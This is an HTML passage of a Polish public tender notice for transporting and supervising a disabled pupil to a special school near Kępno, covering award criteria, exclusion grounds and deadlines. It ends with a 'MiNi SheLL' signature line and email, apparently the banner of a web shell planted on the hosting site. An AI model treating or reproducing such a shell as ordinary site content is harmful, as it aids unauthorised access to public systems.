class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji na wprowadzenie autobusu zastępczego w przypadku awarii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa związana z realizacją obowiązku określonego w art. 39 ust. 4 ustawy z dnia 14 grudnia 2016 r. – Prawo oświatowe, polegająca na dowożeniu i opiece w czasie przewozu do:<br/>Część III<br/>•	szkoły umożliwiającej realizację obowiązku szkolnego, tj. Zespołu Szkół Specjalnych w Słupii pod Kępnem, ul. Katowicka 8, 63-604 Baranów – jednego ucznia z niepełnosprawnością sprzężoną: niepełnosprawnością ruchową oraz niepełnosprawnością intelektualną w stopniu umiarkowanym mieszkającego w Namysłowie.<br/>Wykonawca zobowiązany jest zawieźć uczniów w godzinach rannych (ustalonych z rodzicami uczniów) do szkoły, a następnie przywieźć po zajęciach z powrotem do domu. Wykonawca zobowiązany jest do świadczenia usługi terminowo i punktualnie.<br/>W ramach usługi Wykonawca zobowiązany jest do zapewnienia stałej opieki nad przewożonymi uczniami. Funkcję opiekuna może sprawować wyłącznie osoba pełnoletnia, mająca zdolność do czynności prawnych. Funkcji opiekuna nie może pełnić kierowca pojazdu, którym przewożeni będą uczniowie. Osoba pełniąca funkcję opiekuna zobowiązana będzie przyjąć uczniów od rodzica/rodziców, sprawować nad nimi opiekę w czasie przewozu i przekazać, po przyjeździe do szkoły, pod opiekę nauczycielowi lub opiekunowi w szkole, następnie po zakończonych zajęciach odebrać uczniów od nauczyciela, sprawować opiekę nad nimi w czasie przewozu i po powrocie przekazać rodzicowi/rodzicom. Osoba pełniąca funkcję opiekuna winna być wyposażona w środek łączności, np. telefon komórkowy, umożliwiający kontakt z rodzicem/rodzicami uczniów.<br/>W przypadku czasowej niemożności świadczenia usług przewozowych, w uzasadnionych przypadkach (np. w czasie choroby lub awarii pojazdu), Wykonawca zobowiązuje się do niezwłocznego zorganizowania zastępstwa zapewniającego równorzędny poziom usług.<br/>Wykonawca nie może powierzyć świadczenia usługi będącej przedmiotem zamówienia podwykonawcy, bez uprzedniej pisemnej zgody Zamawiającego.<br/>Wykonawca zobowiązuje się ponadto do:<br/>1)	zapewnienia środka transportu, który spełnia wymagania określone w przepisach ustawy – Prawo o ruchu drogowym i innych przepisach związanych z przewozem osób, w tym umożliwiającego przewiezienie wózka inwalidzkiego w przypadku zamówienia, o którym mowa w części II (dziecko z niepełnosprawnością może być przewożone na odpowiednio zabezpieczonym wózku inwalidzkim lub w fotelu pasażera, a wózek w bagażniku);<br/>2)	posiadania aktualnego przeglądu technicznego pojazdu;<br/>3)	posiadania aktualnego ubezpieczenia od odpowiedzialności cywilnej oraz ubezpieczenia od Następstw Nieszczęśliwych Wypadków kierowcy i pasażerów (NNW),<br/>4)	zachowania w tajemnicy danych osobowych ucznia/uczniów, zgodnie z ustawą z dnia 10 maja 2018 r. o ochronie danych osobowych. <br/>Wykonawca ponosi odpowiedzialność za działania osób, którym powierzy wykonanie określonych czynności związanych z wykonaniem przedmiotu zamówienia. <br/>Z tytułu świadczenia usługi związanej z przedmiotem zamówienia Wykonawca otrzymywać będzie wynagrodzenie za każdy dzień świadczenia usługi. <br/>W przypadku ograniczenia w funkcjonowaniu lub zamknięcia jednostek oświatowych, w związku z uzasadnionymi okolicznościami zagrażającymi życiu lub zdrowiu dzieci i uczniów niezależnymi od Zamawiającego oraz Wykonawcy, a tym samym zaprzestania przez Wykonawcę przewozu uczniów do placówki oświatowej, Wykonawca otrzymywać będzie wynagrodzenie w wysokości 30 % wynagrodzenia umownego, za dni w których pozostawał w gotowości do świadczenia usługi będącej przedmiotem zamówienia.<br/>Wykonawca nie otrzyma wynagrodzenia na dni nieświadczenia usługi z przyczyn leżących po stronie rodziców uczniów (np. choroba dziecka).<br/>Wynagrodzenie ustalane będzie odrębnie za każdy miesiąc kalendarzowy.<br/>Faktura za usługę powinna być wystawiona w terminie do 5 roboczego dnia miesiąca następującego po miesiącu rozliczeniowym. <br/>Zamawiający zastrzega sobie prawo do rutynowej kontroli umowy, w tym sposobu wykonywania usługi będącej przedmiotem zamówienia, a także stanu technicznego pojazdów <br/>oraz trzeźwości kierowców przy pomocy odpowiednio uprawnionych do tego służb (Policja, Inspekcja Transportu Drogowego).<br/>Zamawiający dopuszcza możliwość składania ofert częściowych. Zamówienie zostało podzielone na 3 części. Każdy Wykonawca może złożyć ofertę na dowolną liczbę części. Zamawiający nie ogranicza liczby części, które udzieli jednemu Wykonawcy. <br/>Szacunkowa liczba dni świadczenia usług – 186 dni. Wykonawca będzie rozliczał się z Zamawiającym wg faktycznej liczby dni świadczenia usług. Zamawiający zobowiązany jest wykorzystać co najmniej 60% wartości brutto umowy.<br/>Zamawiający zapłaci Wykonawcy wynagrodzenie za faktyczne dni świadczenia usług zrealizowanych na podstawie niniejszej umowy, stanowiące sumę iloczynów cen jednostkowych za jeden dzień świadczenia usług oraz liczbę dni świadczenia usług. <br/>Wykonawca zobowiązany jest zrealizować zamówienie na zasadach i warunkach opisanych w SWZ i ofercie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60140000-1 - Nieregularny transport osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-09-01 do 2023-06-23</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji na wprowadzenie autobusu zastępczego w przypadku awarii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw do wykluczenia Wykonawcy z udziału w postępowaniu: - na podstawie § 3 Rozporządzenia Ministra Rozwoju, Pracy i<br/>Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać Zamawiający od Wykonawcy (Dz. U. z 2020 r., poz. 2415), Zamawiający żąda oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w pkt 3.1. SWZ, w zakresie podstaw wykluczenia z postępowania<br/>wskazanych przez Zamawiającego. Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które Zamawiający posiada, jeżeli Wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i aktualność</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>2.3.2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może podlegać wykluczeniu na podstawie art. 108 ust. 1 ustawy Pzp i art. 109 ust. 1 pkt 4 ustawy Pzp, z zachowaniem przepisów art. 109 ust. 3, art. 110 oraz art. 111 ustawy Pzp oraz nie może podlegać wykluczeniu na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego, natomiast spełnienie warunków udziału w postępowaniu Wykonawcy wykazują zgodnie z pkt 2.1.2 SWZ.<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie, o którym mowa w pkt. 3.1. SWZ składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenie to potwierdza brak podstaw wykluczenia.<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców <br/>są oni zobowiązani na wezwanie Zamawiającego złożyć dokumenty i oświadczenia, o których mowa w pkt 3.5. SWZ, przy czym dokumenty i oświadczenia, o których mowa w pkt 3.5.2 SWZ składa każdy z nich.<br/>W przypadku, gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia, składają oświadczenie, z którego wynika, które usługi będą wykonywać poszczególni Wykonawcy – załącznik nr 2 do oferty <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia zostały zawarte w § 14 projektu umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-08-16 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy umieścić na platformie zakupowej pod adresem: https://namyslow.ezamawiajacy.pl/app/login w zakładce „OFERTY&#34;</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-08-16 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-09-14</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com